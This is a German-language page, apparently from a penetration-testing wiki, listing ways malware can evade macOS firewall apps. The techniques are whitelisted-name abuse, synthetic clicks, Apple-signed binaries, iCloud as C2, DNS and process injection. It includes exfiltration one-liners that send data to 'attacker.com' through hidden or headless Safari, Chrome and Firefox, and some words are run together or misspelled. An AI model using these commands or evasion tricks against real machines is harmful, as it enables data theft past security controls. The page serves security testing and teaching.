2.3 KiB
macOS Bypassing Firewalls
{{#include ../../banners/hacktricks-training.md}}
Gefundene Techniken
Die folgenden Techniken wurden in einigen macOS-Firewall-Apps als funktionierend festgestellt.
Missbrauch von Whitelist-Namen
- Zum Beispiel das Malware mit Namen bekannter macOS-Prozesse wie
launchdaufzurufen.
Synthetischer Klick
- Wenn die Firewall den Benutzer um Erlaubnis bittet, lasse die Malware auf Erlauben klicken.
Verwende von Apple signierte Binaries
- Wie
curl, aber auch andere wiewhois.
Bekannte Apple-Domains
Die Firewall könnte Verbindungen zu bekannten Apple-Domains wie apple.com oder icloud.com erlauben. Und iCloud könnte als C2 verwendet werden.
Generischer Bypass
Einige Ideen, um zu versuchen, Firewalls zu umgehen.
Überprüfen des erlaubten Verkehrs
Das Wissen um den erlaubten Verkehr wird Ihnen helfen, potenziell auf die Whitelist gesetzte Domains oder welche Anwendungen ihnen Zugriff gewährt wird, zu identifizieren.
lsof -i TCP -sTCP:ESTABLISHED
Missbrauch von DNS
DNS-Auflösungen erfolgen über die mdnsreponder signierte Anwendung, die wahrscheinlich berechtigt ist, DNS-Server zu kontaktieren.
Über Browser-Apps
- oascript
tell application "Safari"
run
tell application "Finder" to set visible of process "Safari" to false
make new document
set the URL of document 1 to "https://attacker.com?data=data%20to%20exfil
end tell
- Google Chrome
"Google Chrome" --crash-dumps-dir=/tmp --headless "https://attacker.com?data=data%20to%20exfil"
- Firefox
firefox-bin --headless "https://attacker.com?data=data%20to%20exfil"
- Safari
open -j -a Safari "https://attacker.com?data=data%20to%20exfil"
Durch Prozessinjektionen
Wenn Sie Code in einen Prozess injizieren können, der berechtigt ist, eine Verbindung zu einem beliebigen Server herzustellen, könnten Sie die Firewall-Schutzmaßnahmen umgehen:
{{#ref}} macos-proces-abuse/ {{#endref}}
Referenzen
{{#include ../../banners/hacktricks-training.md}}